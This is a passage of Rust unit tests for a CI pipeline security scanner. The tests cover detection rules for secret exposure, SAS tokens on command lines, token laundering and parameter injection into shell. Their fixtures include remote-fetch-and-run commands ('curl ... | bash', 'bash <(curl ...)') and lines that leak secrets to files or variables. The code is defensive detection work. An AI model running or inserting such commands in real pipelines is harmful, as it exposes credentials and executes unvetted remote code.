8326        assert!(findings.is_empty());
8327    }
8328
8329    #[test]
8330    fn vm_remote_exec_does_not_fire_when_remote_exec_has_no_secret_or_sas() {
8331        // Set-AzVMExtension with a static command line, no SAS, no secret —
8332        // should not fire (no exposed credential).
8333        let body = r#"
8334            Set-AzVMExtension -ResourceGroupName rg -VMName vm -Name diag `
8335                -Publisher Microsoft.Azure.Diagnostics -ExtensionType IaaSDiagnostics `
8336                -Settings @{ "xmlCfg" = "<wadcfg/>" }
8337        "#;
8338        let g = graph_with_script_step(body, None);
8339        let findings = vm_remote_exec_via_pipeline_secret(&g);
8340        assert!(
8341            findings.is_empty(),
8342            "no SAS-mint and no secret interpolation → no finding"
8343        );
8344    }
8345
8346    #[test]
8347    fn vm_remote_exec_fires_on_az_cli_run_command() {
8348        let body = r#"
8349            az vm run-command invoke --resource-group rg --name vm `
8350                --command-id RunShellScript --scripts "echo $(DB_PASSWORD) > /tmp/x"
8351        "#;
8352        let g = graph_with_script_step(body, Some("DB_PASSWORD"));
8353        let findings = vm_remote_exec_via_pipeline_secret(&g);
8354        assert_eq!(findings.len(), 1);
8355        assert!(findings[0].message.contains("az vm run-command"));
8356    }
8357
8358    // ── short_lived_sas_in_command_line ─────────────────
8359
8360    #[test]
8361    fn sas_in_cmdline_fires_on_minted_sas_interpolated_into_command_to_execute() {
8362        let body = r#"
8363            $sastokenpackages = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8364            $settings = @{ "commandToExecute" = "powershell install.ps1 -sas `"$sastokenpackages`"" }
8365        "#;
8366        let g = graph_with_script_step(body, None);
8367        let findings = short_lived_sas_in_command_line(&g);
8368        assert_eq!(findings.len(), 1);
8369        assert_eq!(
8370            findings[0].category,
8371            FindingCategory::ShortLivedSasInCommandLine
8372        );
8373        assert_eq!(findings[0].severity, Severity::Medium);
8374        assert!(findings[0].message.contains("sastokenpackages"));
8375    }
8376
8377    #[test]
8378    fn sas_in_cmdline_does_not_fire_when_sas_is_only_uploaded_to_blob() {
8379        // SAS minted but never put on argv — only used to build a URL.
8380        let body = r#"
8381            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8382            $url = "https://acct.blob.core.windows.net/c/?" + $sas
8383            Invoke-WebRequest -Uri $url -OutFile foo.zip
8384        "#;
8385        let g = graph_with_script_step(body, None);
8386        let findings = short_lived_sas_in_command_line(&g);
8387        assert!(findings.is_empty(), "no command-line sink → no finding");
8388    }
8389
8390    #[test]
8391    fn sas_in_cmdline_does_not_fire_without_sas_mint() {
8392        let body = r#"
8393            $settings = @{ "commandToExecute" = "powershell -File foo.ps1" }
8394        "#;
8395        let g = graph_with_script_step(body, None);
8396        let findings = short_lived_sas_in_command_line(&g);
8397        assert!(findings.is_empty());
8398    }
8399
8400    #[test]
8401    fn sas_in_cmdline_fires_on_az_cli_generate_sas_with_arguments() {
8402        let body = r#"
8403            sas=$(az storage container generate-sas --name c --account-name acct --permissions r --expiry 2099-01-01 -o tsv)
8404            az vm extension set --vm-name vm --resource-group rg --name CustomScript --publisher Microsoft.Compute \
8405                --settings "{ \"commandToExecute\": \"curl https://acct.blob.core.windows.net/c/foo?$sas\" }"
8406        "#;
8407        let g = graph_with_script_step(body, None);
8408        let findings = short_lived_sas_in_command_line(&g);
8409        // mint + sink in same script → fires (fallback evidence path).
8410        assert_eq!(findings.len(), 1);
8411    }
8412
8413    #[test]
8414    fn co_fire_on_solarwinds_pattern() {
8415        // Mirrors the corpus solarwinds shape: SAS minted, embedded in
8416        // CustomScriptExtension commandToExecute. Both rules must fire.
8417        let body = r#"
8418            $sastokenpackages = New-AzStorageContainerSASToken -Container $pc -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8419            Set-AzVMExtension -ResourceGroupName $rg -VMName $vm `
8420                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8421                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -sas `"$sastokenpackages`"" }
8422        "#;
8423        let g = graph_with_script_step(body, None);
8424        let r6 = vm_remote_exec_via_pipeline_secret(&g);
8425        let r7 = short_lived_sas_in_command_line(&g);
8426        assert_eq!(r6.len(), 1, "rule 6 must fire on solarwinds shape");
8427        assert_eq!(r7.len(), 1, "rule 7 must fire on solarwinds shape");
8428    }
8429
8430    #[test]
8431    fn body_interpolates_var_does_not_match_prefix() {
8432        // `$sas` should not match `$sastokenpackages`.
8433        assert!(!body_interpolates_var(
8434            "Write-Host $sastokenpackages",
8435            "sas"
8436        ));
8437        assert!(body_interpolates_var(
8438            "Write-Host $sastokenpackages",
8439            "sastokenpackages"
8440        ));
8441        assert!(body_interpolates_var("echo $(SECRET)", "SECRET"));
8442    }
8443
8444    #[test]
8445    fn powershell_sas_assignments_extracts_var_names() {
8446        let body = r#"
8447            $a = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r
8448            $b = Get-Date
8449            $sasBlob = New-AzStorageBlobSASToken -Container c -Blob foo -Context $ctx -Permission r
8450        "#;
8451        let names = powershell_sas_assignments(body);
8452        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("a")));
8453        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("sasBlob")));
8454        assert!(!names.iter().any(|n| n.eq_ignore_ascii_case("b")));
8455    }
8456
8457    #[test]
8458    fn bash_export_of_pipeline_secret_flagged() {
8459        let g = build_step_with_script(
8460            "TF_TOKEN",
8461            "echo init\nexport TF_TOKEN_app_terraform_io=\"$(TF_TOKEN)\"\nterraform init",
8462        );
8463        let findings = secret_to_inline_script_env_export(&g);
8464        assert_eq!(findings.len(), 1);
8465        assert_eq!(findings[0].severity, Severity::High);
8466        assert!(findings[0].message.contains("$(TF_TOKEN)"));
8467    }
8468
8469    #[test]
8470    fn powershell_assignment_of_pipeline_secret_flagged() {
8471        let g = build_step_with_script(
8472            "AppContainerDBPassword",
8473            "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n$x = 1",
8474        );
8475        let findings = secret_to_inline_script_env_export(&g);
8476        assert_eq!(findings.len(), 1);
8477        assert!(findings[0].message.contains("$(AppContainerDBPassword)"));
8478    }
8479
8480    #[test]
8481    fn secret_passed_as_command_argument_not_flagged() {
8482        // Secret used as a CLI argument, not assigned to a variable. This is
8483        // covered by the separate META_CLI_FLAG_EXPOSED detection — env_export
8484        // should NOT also fire here.
8485        let g = build_step_with_script("TF_TOKEN", "terraform plan -var \"token=$(TF_TOKEN)\"");
8486        let findings = secret_to_inline_script_env_export(&g);
8487        assert!(
8488            findings.is_empty(),
8489            "command-arg use of $(SECRET) must not trip env-export rule"
8490        );
8491    }
8492
8493    #[test]
8494    fn step_without_script_body_not_flagged() {
8495        let mut g = AuthorityGraph::new(source("ado.yml"));
8496        let secret = g.add_node(NodeKind::Secret, "TF_TOKEN", TrustZone::FirstParty);
8497        let step = g.add_node(NodeKind::Step, "task", TrustZone::FirstParty);
8498        g.add_edge(step, secret, EdgeKind::HasAccessTo);
8499        let findings = secret_to_inline_script_env_export(&g);
8500        assert!(findings.is_empty());
8501    }
8502
8503    // ── secret_materialised_to_workspace_file ────────────────
8504
8505    #[test]
8506    fn powershell_outfile_of_secret_to_workspace_flagged() {
8507        // Mirrors Azure_Landing_Zone/userapp-n8nx pattern: secret bound to
8508        // $var, then $var written via Out-File to $(System.DefaultWorkingDirectory).
8509        let script = "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n\
8510                      $TFfile = Get-Content $(System.DefaultWorkingDirectory)/in.tfvars\n\
8511                      $TFfile = $TFfile.Replace(\"x\", $AppContainerDBPassword)\n\
8512                      $TFfile | Out-File $(System.DefaultWorkingDirectory)/envVars/tffile.tfvars";
8513        let g = build_step_with_script("AppContainerDBPassword", script);
8514        let findings = secret_materialised_to_workspace_file(&g);
8515        assert_eq!(
8516            findings.len(),
8517            1,
8518            "Out-File of bound secret to workspace must fire"
8519        );
8520        assert_eq!(findings[0].severity, Severity::High);
8521    }
8522
8523    #[test]
8524    fn bash_redirect_of_secret_to_tfvars_flagged() {
8525        let script =
8526            "echo \"token = \\\"$(TF_TOKEN)\\\"\" > $(Build.SourcesDirectory)/secrets.tfvars";
8527        let g = build_step_with_script("TF_TOKEN", script);
8528        let findings = secret_materialised_to_workspace_file(&g);
8529        assert_eq!(findings.len(), 1);
8530    }
8531
8532    #[test]
8533    fn echoing_secret_to_stdout_not_flagged_by_materialisation_rule() {
8534        let g = build_step_with_script("TF_TOKEN", "echo using $(TF_TOKEN)\nterraform init");
8535        let findings = secret_materialised_to_workspace_file(&g);
8536        assert!(
8537            findings.is_empty(),
8538            "stdout echo (no file sink) must not trip materialisation rule"
8539        );
8540    }
8541
8542    #[test]
8543    fn write_to_unrelated_path_not_flagged() {
8544        // No workspace-path keyword, no risky extension — should not fire.
8545        let script = "echo $(MY_SECRET) > /var/tmp/ignore.log";
8546        let g = build_step_with_script("MY_SECRET", script);
8547        let findings = secret_materialised_to_workspace_file(&g);
8548        assert!(findings.is_empty());
8549    }
8550
8551    // ── keyvault_secret_to_plaintext ─────────────────────────
8552
8553    #[test]
8554    fn keyvault_asplaintext_flagged() {
8555        let script = "$pass = Get-AzKeyVaultSecret -VaultName foo -Name bar -AsPlainText\n\
8556                      Write-Host done";
8557        let g = build_step_with_script("UNUSED", script);
8558        let findings = keyvault_secret_to_plaintext(&g);
8559        assert_eq!(findings.len(), 1);
8560        assert_eq!(findings[0].severity, Severity::Medium);
8561    }
8562
8563    #[test]
8564    fn keyvault_secretvaluetext_legacy_pattern_flagged() {
8565        let script = "$pwd = (Get-AzKeyVaultSecret -VaultName foo -Name bar).SecretValueText";
8566        let g = build_step_with_script("UNUSED", script);
8567        let findings = keyvault_secret_to_plaintext(&g);
8568        assert_eq!(findings.len(), 1);
8569    }
8570
8571    #[test]
8572    fn convertfrom_securestring_asplaintext_flagged() {
8573        let script = "$plain = ConvertFrom-SecureString $sec -AsPlainText";
8574        let g = build_step_with_script("UNUSED", script);
8575        let findings = keyvault_secret_to_plaintext(&g);
8576        assert_eq!(findings.len(), 1);
8577    }
8578
8579    #[test]
8580    fn keyvault_securestring_handling_not_flagged() {
8581        // Using the secret as SecureString (no -AsPlainText) is the safe pattern.
8582        let script = "$sec = Get-AzKeyVaultSecret -VaultName foo -Name bar\n\
8583                      $cred = New-Object PSCredential 'svc', $sec.SecretValue";
8584        let g = build_step_with_script("UNUSED", script);
8585        let findings = keyvault_secret_to_plaintext(&g);
8586        assert!(
8587            findings.is_empty(),
8588            "SecureString-only handling is the recommended pattern and must not fire"
8589        );
8590    }
8591
8592    // ── terraform_auto_approve_in_prod ──────────────────────
8593
8594    fn step_with_meta(g: &mut AuthorityGraph, name: &str, meta: &[(&str, &str)]) -> NodeId {
8595        let mut m = std::collections::HashMap::new();
8596        for (k, v) in meta {
8597            m.insert((*k).to_string(), (*v).to_string());
8598        }
8599        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, m)
8600    }
8601
8602    #[test]
8603    fn terraform_auto_approve_against_prod_connection_fires() {
8604        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8605        step_with_meta(
8606            &mut g,
8607            "Terraform : Apply",
8608            &[
8609                (META_TERRAFORM_AUTO_APPROVE, "true"),
8610                (META_SERVICE_CONNECTION_NAME, "sharedservice-w365-prod-sc"),
8611            ],
8612        );
8613
8614        let findings = terraform_auto_approve_in_prod(&g);
8615        assert_eq!(findings.len(), 1);
8616        assert_eq!(findings[0].severity, Severity::Critical);
8617        assert_eq!(
8618            findings[0].category,
8619            FindingCategory::TerraformAutoApproveInProd
8620        );
8621        assert!(
8622            findings[0].message.contains("sharedservice-w365-prod-sc"),
8623            "message should name the connection, got: {}",
8624            findings[0].message
8625        );
8626    }
8627
8628    #[test]
8629    fn terraform_auto_approve_via_edge_to_service_connection_identity() {
8630        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8631        let step = step_with_meta(
8632            &mut g,
8633            "Terraform : Apply",
8634            &[(META_TERRAFORM_AUTO_APPROVE, "true")],
8635        );
8636        let mut id_meta = std::collections::HashMap::new();
8637        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
8638        let conn = g.add_node_with_metadata(
8639            NodeKind::Identity,
8640            "alz-infra-sc-prd-uks",
8641            TrustZone::FirstParty,
8642            id_meta,
8643        );
8644        g.add_edge(step, conn, EdgeKind::HasAccessTo);
8645
8646        let findings = terraform_auto_approve_in_prod(&g);
8647        assert_eq!(findings.len(), 1);
8648        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
8649    }
8650
8651    #[test]
8652    fn terraform_auto_approve_with_env_gate_downgrades_to_medium() {
8653        // Per blue-team CC-4: env gate is a partial control (the gate's
8654        // approver list is invisible from YAML), so the finding stays
8655        // visible at Medium rather than disappearing entirely.
8656        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8657        step_with_meta(
8658            &mut g,
8659            "Terraform : Apply",
8660            &[
8661                (META_TERRAFORM_AUTO_APPROVE, "true"),
8662                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
8663                (META_ENV_APPROVAL, "true"),
8664            ],
8665        );
8666
8667        let findings = terraform_auto_approve_in_prod(&g);
8668        assert_eq!(
8669            findings.len(),
8670            1,
8671            "env-gated apply must still emit a finding"
8672        );
8673        assert_eq!(
8674            findings[0].severity,
8675            Severity::Medium,
8676            "env-gated apply downgrades Critical → Medium (compensating control credit)"
8677        );
8678        assert!(findings[0]
8679            .message
8680            .contains("`environment:` binding present"));
8681    }
8682
8683    #[test]
8684    fn terraform_auto_approve_against_non_prod_does_not_fire() {
8685        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8686        step_with_meta(
8687            &mut g,
8688            "Terraform : Apply",
8689            &[
8690                (META_TERRAFORM_AUTO_APPROVE, "true"),
8691                (META_SERVICE_CONNECTION_NAME, "platform-dev-sc"),
8692            ],
8693        );
8694
8695        let findings = terraform_auto_approve_in_prod(&g);
8696        assert!(findings.is_empty(), "dev connection must not match prod");
8697    }
8698
8699    #[test]
8700    fn terraform_apply_without_auto_approve_does_not_fire() {
8701        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8702        step_with_meta(
8703            &mut g,
8704            "Terraform : Apply",
8705            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
8706        );
8707
8708        let findings = terraform_auto_approve_in_prod(&g);
8709        assert!(findings.is_empty());
8710    }
8711
8712    #[test]
8713    fn looks_like_prod_connection_matches_real_world_names() {
8714        assert!(looks_like_prod_connection("sharedservice-w365-prod-sc"));
8715        assert!(looks_like_prod_connection("alz-infra-sc-prd"));
8716        assert!(looks_like_prod_connection("prod-tenant-arm"));
8717        assert!(looks_like_prod_connection("PROD"));
8718        assert!(looks_like_prod_connection("my_prod_arm"));
8719        // Negatives — substrings inside other words must not match
8720        assert!(!looks_like_prod_connection("approver-sc"));
8721        assert!(!looks_like_prod_connection("reproducer-sc"));
8722        assert!(!looks_like_prod_connection("dev-sc"));
8723        assert!(!looks_like_prod_connection("staging"));
8724    }
8725
8726    // ── addspn_with_inline_script ───────────────────────────
8727
8728    #[test]
8729    fn addspn_with_inline_script_fires_with_basic_body() {
8730        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8731        step_with_meta(
8732            &mut g,
8733            "ado : azure : login (federated)",
8734            &[
8735                (META_ADD_SPN_TO_ENV, "true"),
8736                (META_SCRIPT_BODY, "az account show --query id -o tsv"),
8737            ],
8738        );
8739
8740        let findings = addspn_with_inline_script(&g);
8741        assert_eq!(findings.len(), 1);
8742        assert_eq!(findings[0].severity, Severity::High);
8743        assert!(!findings[0]
8744            .message
8745            .contains("explicit token laundering detected"));
8746    }
8747
8748    #[test]
8749    fn addspn_with_inline_script_escalates_message_on_token_laundering() {
8750        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8751        step_with_meta(
8752            &mut g,
8753            "ado : azure : login (federated)",
8754            &[
8755                (META_ADD_SPN_TO_ENV, "true"),
8756                (
8757                    META_SCRIPT_BODY,
8758                    "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\"",
8759                ),
8760            ],
8761        );
8762
8763        let findings = addspn_with_inline_script(&g);
8764        assert_eq!(findings.len(), 1);
8765        assert!(
8766            findings[0]
8767                .message
8768                .contains("explicit token laundering detected"),
8769            "message should escalate, got: {}",
8770            findings[0].message
8771        );
8772    }
8773
8774    #[test]
8775    fn addspn_without_inline_script_does_not_fire() {
8776        // No META_SCRIPT_BODY → scriptPath form, not inline
8777        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8778        step_with_meta(
8779            &mut g,
8780            "AzureCLI scriptPath",
8781            &[(META_ADD_SPN_TO_ENV, "true")],
8782        );
8783
8784        let findings = addspn_with_inline_script(&g);
8785        assert!(findings.is_empty());
8786    }
8787
8788    #[test]
8789    fn inline_script_without_addspn_does_not_fire() {
8790        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8791        step_with_meta(
8792            &mut g,
8793            "az account show",
8794            &[(META_SCRIPT_BODY, "az account show")],
8795        );
8796
8797        let findings = addspn_with_inline_script(&g);
8798        assert!(findings.is_empty());
8799    }
8800
8801    #[test]
8802    fn script_launders_spn_token_recognises_known_markers() {
8803        assert!(script_launders_spn_token(
8804            "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\""
8805        ));
8806        assert!(script_launders_spn_token(
8807            "echo \"##vso[task.setvariable variable=X]$env:servicePrincipalKey\""
8808        ));
8809        // setvariable without token material → not laundering, just env mutation
8810        assert!(!script_launders_spn_token(
8811            "echo \"##vso[task.setvariable variable=X]hello\""
8812        ));
8813        // No setvariable at all
8814        assert!(!script_launders_spn_token("$env:idToken"));
8815    }
8816
8817    // ── parameter_interpolation_into_shell ──────────────────
8818
8819    fn graph_with_param(spec: ParamSpec, name: &str) -> AuthorityGraph {
8820        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8821        g.parameters.insert(name.to_string(), spec);
8822        g
8823    }
8824
8825    #[test]
8826    fn parameter_interpolation_fires_on_free_form_string_in_inline_script() {
8827        let mut g = graph_with_param(
8828            ParamSpec {
8829                param_type: "string".into(),
8830                has_values_allowlist: false,
8831            },
8832            "appName",
8833        );
8834        step_with_meta(
8835            &mut g,
8836            "terraform workspace",
8837            &[(
8838                META_SCRIPT_BODY,
8839                "terraform workspace select -or-create ${{ parameters.appName }}",
8840            )],
8841        );
8842
8843        let findings = parameter_interpolation_into_shell(&g);
8844        assert_eq!(findings.len(), 1);
8845        assert_eq!(findings[0].severity, Severity::Medium);
8846        assert!(findings[0].message.contains("appName"));
8847    }
8848
8849    #[test]
8850    fn parameter_interpolation_with_values_allowlist_does_not_fire() {
8851        let mut g = graph_with_param(
8852            ParamSpec {
8853                param_type: "string".into(),
8854                has_values_allowlist: true,
8855            },
8856            "location",
8857        );
8858        step_with_meta(
8859            &mut g,
8860            "Terraform Plan",
8861            &[(
8862                META_SCRIPT_BODY,
8863                "terraform plan -var=\"location=${{ parameters.location }}\"",
8864            )],
8865        );
8866
8867        let findings = parameter_interpolation_into_shell(&g);
8868        assert!(
8869            findings.is_empty(),
8870            "values: allowlist must suppress the finding"
8871        );
8872    }
8873
8874    #[test]
8875    fn parameter_interpolation_default_type_is_treated_as_string() {
8876        let mut g = graph_with_param(
8877            ParamSpec {
8878                // ADO defaults missing `type:` to string — same risk
8879                param_type: "".into(),
8880                has_values_allowlist: false,
8881            },
8882            "appName",
8883        );
8884        step_with_meta(
8885            &mut g,
8886            "Terraform : Plan",
8887            &[(
8888                META_SCRIPT_BODY,
8889                "terraform plan -var \"appName=${{ parameters.appName }}\"",
8890            )],
8891        );
8892
8893        let findings = parameter_interpolation_into_shell(&g);
8894        assert_eq!(findings.len(), 1, "missing type: must default to string");
8895    }
8896
8897    #[test]
8898    fn parameter_interpolation_skips_non_string_params() {
8899        let mut g = graph_with_param(
8900            ParamSpec {
8901                param_type: "boolean".into(),
8902                has_values_allowlist: false,
8903            },
8904            "enabled",
8905        );
8906        step_with_meta(
8907            &mut g,
8908            "step",
8909            &[(META_SCRIPT_BODY, "echo ${{ parameters.enabled }}")],
8910        );
8911
8912        let findings = parameter_interpolation_into_shell(&g);
8913        assert!(findings.is_empty(), "boolean params can't carry shell");
8914    }
8915
8916    #[test]
8917    fn parameter_interpolation_no_spaces_form_also_matches() {
8918        let mut g = graph_with_param(
8919            ParamSpec {
8920                param_type: "string".into(),
8921                has_values_allowlist: false,
8922            },
8923            "x",
8924        );
8925        step_with_meta(
8926            &mut g,
8927            "step",
8928            &[(META_SCRIPT_BODY, "echo ${{parameters.x}}")],
8929        );
8930
8931        let findings = parameter_interpolation_into_shell(&g);
8932        assert_eq!(findings.len(), 1);
8933    }
8934
8935    #[test]
8936    fn parameter_interpolation_skips_step_without_script_body() {
8937        let mut g = graph_with_param(
8938            ParamSpec {
8939                param_type: "string".into(),
8940                has_values_allowlist: false,
8941            },
8942            "appName",
8943        );
8944        // Step has no META_SCRIPT_BODY (e.g. a typed task without an inline script)
8945        g.add_node(NodeKind::Step, "task-step", TrustZone::Untrusted);
8946
8947        let findings = parameter_interpolation_into_shell(&g);
8948        assert!(findings.is_empty());
8949    }
8950
8951    // ── runtime_script_fetched_from_floating_url ───────────────
8952
8953    fn step_with_body(body: &str) -> AuthorityGraph {
8954        let mut g = AuthorityGraph::new(source("ci.yml"));
8955        let id = g.add_node(NodeKind::Step, "install", TrustZone::FirstParty);
8956        if let Some(node) = g.nodes.get_mut(id) {
8957            node.metadata
8958                .insert(META_SCRIPT_BODY.into(), body.to_string());
8959        }
8960        g
8961    }
8962
8963    #[test]
8964    fn floating_curl_pipe_bash_master_is_flagged() {
8965        let g = step_with_body(
8966            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash",
8967        );
8968        let findings = runtime_script_fetched_from_floating_url(&g);
8969        assert_eq!(findings.len(), 1);
8970        assert_eq!(findings[0].severity, Severity::High);
8971        assert_eq!(
8972            findings[0].category,
8973            FindingCategory::RuntimeScriptFetchedFromFloatingUrl
8974        );
8975    }
8976
8977    #[test]
8978    fn floating_deno_run_main_is_flagged() {
8979        let g = step_with_body(
8980            "deno run https://raw.githubusercontent.com/denoland/deno/refs/heads/main/tools/verify_pr_title.js \"$PR_TITLE\"",
8981        );
8982        let findings = runtime_script_fetched_from_floating_url(&g);
8983        assert_eq!(findings.len(), 1);
8984    }
8985
8986    #[test]
8987    fn pinned_curl_url_with_tag_not_flagged() {
8988        let g = step_with_body(
8989            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/v0.33.10/scripts/install.sh | bash",
8990        );
8991        let findings = runtime_script_fetched_from_floating_url(&g);
8992        assert!(findings.is_empty(), "tag-pinned URL must not fire");
8993    }
8994
8995    #[test]
8996    fn curl_without_pipe_to_shell_not_flagged() {
8997        // `curl -O` writes to disk; the script isn't executed inline.
8998        let g = step_with_body(
8999            "curl -sSLO https://raw.githubusercontent.com/rust-lang/rust/master/src/tools/linkchecker/linkcheck.sh",
9000        );
9001        let findings = runtime_script_fetched_from_floating_url(&g);
9002        assert!(findings.is_empty(), "download-only must not fire");
9003    }
9004
9005    #[test]
9006    fn bash_process_substitution_curl_main_is_flagged() {
9007        let g = step_with_body(
9008            "bash <(curl -s https://raw.githubusercontent.com/some/repo/main/install.sh)",
9009        );
9010        let findings = runtime_script_fetched_from_floating_url(&g);
9011        assert_eq!(findings.len(), 1);
9012    }
9013
9014    // ── pr_trigger_with_floating_action_ref ────────────────────
9015
9016    fn graph_with_trigger_and_action(trigger: &str, action: &str) -> AuthorityGraph {
9017        let mut g = AuthorityGraph::new(source("pr.yml"));
9018        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9019        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9020        g
9021    }
9022
9023    #[test]
9024    fn pull_request_target_with_floating_main_action_flagged_critical() {
9025        let g = graph_with_trigger_and_action("pull_request_target", "actions/checkout@main");
9026        let findings = pr_trigger_with_floating_action_ref(&g);
9027        assert_eq!(findings.len(), 1);
9028        assert_eq!(findings[0].severity, Severity::Critical);
9029        assert_eq!(
9030            findings[0].category,
9031            FindingCategory::PrTriggerWithFloatingActionRef
9032        );
9033    }
9034
9035    #[test]
9036    fn pull_request_target_with_sha_pinned_action_not_flagged() {
9037        let g = graph_with_trigger_and_action(
9038            "pull_request_target",
9039            "denoland/setup-deno@667a34cdef165d8d2b2e98dde39547c9daac7282",
9040        );
9041        let findings = pr_trigger_with_floating_action_ref(&g);
9042        assert!(findings.is_empty());
9043    }
9044
9045    #[test]
9046    fn issue_comment_with_floating_action_flagged() {
9047        let g = graph_with_trigger_and_action("issue_comment", "foo/bar@v1");
9048        let findings = pr_trigger_with_floating_action_ref(&g);
9049        assert_eq!(findings.len(), 1);
9050    }
9051
9052    #[test]
9053    fn pull_request_only_does_not_trigger_critical_compound_rule() {
9054        // `pull_request` (without `_target`) is the safe trigger — no base
9055        // repo write. Rule 4 must not fire on it.
9056        let g = graph_with_trigger_and_action("pull_request", "foo/bar@main");
9057        let findings = pr_trigger_with_floating_action_ref(&g);
9058        assert!(
9059            findings.is_empty(),
9060            "pull_request alone must not produce a critical compound finding"
9061        );
9062    }
9063
9064    #[test]
9065    fn comma_separated_trigger_with_pull_request_target_flagged() {
9066        let g = graph_with_trigger_and_action(
9067            "pull_request_target,push,workflow_dispatch",
9068            "foo/bar@main",
9069        );
9070        let findings = pr_trigger_with_floating_action_ref(&g);
9071        assert_eq!(findings.len(), 1);
9072    }
9073
9074    // ── untrusted_api_response_to_env_sink ─────────────────────
9075
9076    fn graph_with_trigger_and_step_body(trigger: &str, body: &str) -> AuthorityGraph {
9077        let mut g = AuthorityGraph::new(source("consumer.yml"));
9078        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9079        let id = g.add_node(NodeKind::Step, "capture", TrustZone::FirstParty);
9080        if let Some(node) = g.nodes.get_mut(id) {
9081            node.metadata
9082                .insert(META_SCRIPT_BODY.into(), body.to_string());
9083        }
9084        g
9085    }
9086
9087    #[test]
9088    fn workflow_run_gh_pr_view_to_github_env_flagged() {
9089        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json 'number' --jq '\"PR_NUMBER=\\(.number)\"' >> $GITHUB_ENV";
9090        let g = graph_with_trigger_and_step_body("workflow_run", body);
9091        let findings = untrusted_api_response_to_env_sink(&g);
9092        assert_eq!(findings.len(), 1);
9093        assert_eq!(findings[0].severity, Severity::High);
9094    }
9095
9096    #[test]
9097    fn workflow_run_without_env_sink_not_flagged() {
9098        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json number";
9099        let g = graph_with_trigger_and_step_body("workflow_run", body);
9100        let findings = untrusted_api_response_to_env_sink(&g);
9101        assert!(findings.is_empty());
9102    }
9103
9104    #[test]
9105    fn push_trigger_writing_to_env_not_flagged() {
9106        // Trigger is not in scope (push isn't a cross-workflow trust boundary)
9107        let body = "gh pr view --json number --jq .number >> $GITHUB_ENV";
9108        let g = graph_with_trigger_and_step_body("push", body);
9109        let findings = untrusted_api_response_to_env_sink(&g);
9110        assert!(findings.is_empty());
9111    }
9112
9113    #[test]
9114    fn workflow_run_multiline_capture_then_write_flagged() {
9115        let body = "VAL=$(gh api repos/foo/bar/pulls/$PR --jq .head.ref)\necho \"BRANCH=$VAL\" >> $GITHUB_ENV";
9116        let g = graph_with_trigger_and_step_body("workflow_run", body);
9117        let findings = untrusted_api_response_to_env_sink(&g);
9118        assert_eq!(findings.len(), 1);
9119    }
9120
9121    // ── pr_build_pushes_image_with_floating_credentials ────────
9122
9123    fn graph_pr_with_login_action(trigger: &str, action: &str) -> AuthorityGraph {
9124        let mut g = AuthorityGraph::new(source("pr-build.yml"));
9125        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9126        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9127        g
9128    }
9129
9130    #[test]
9131    fn pr_with_floating_login_to_gar_flagged() {
9132        let g = graph_pr_with_login_action(
9133            "pull_request",
9134            "grafana/shared-workflows/actions/login-to-gar@main",
9135        );
9136        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9137        assert_eq!(findings.len(), 1);
9138        assert_eq!(findings[0].severity, Severity::High);
9139        assert_eq!(
9140            findings[0].category,
9141            FindingCategory::PrBuildPushesImageWithFloatingCredentials
9142        );
9143    }
9144
9145    #[test]
9146    fn pr_with_floating_docker_login_action_flagged() {
9147        let g = graph_pr_with_login_action("pull_request", "docker/login-action@v3");
9148        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9149        assert_eq!(findings.len(), 1);
9150    }
9151
9152    #[test]
9153    fn pr_with_sha_pinned_docker_login_not_flagged() {
9154        let g = graph_pr_with_login_action(
9155            "pull_request",
9156            "docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d",
9157        );
9158        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9159        assert!(findings.is_empty());
9160    }
9161
9162    #[test]
9163    fn push_trigger_with_floating_login_action_not_flagged() {
9164        // Outside PR context — different rule (unpinned_action) covers it.
9165        let g = graph_pr_with_login_action("push", "docker/login-action@v3");
9166        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9167        assert!(findings.is_empty());
9168    }
9169
9170    #[test]
9171    fn pr_with_unrelated_unpinned_action_not_flagged() {
9172        // Rule scopes itself to registry-login actions only; generic actions
9173        // are covered by `unpinned_action` and `pr_trigger_with_floating_action_ref`.
9174        let g = graph_pr_with_login_action("pull_request", "actions/checkout@v4");
9175        let findings = pr_build_pushes_image_with_floating_credentials(&g);
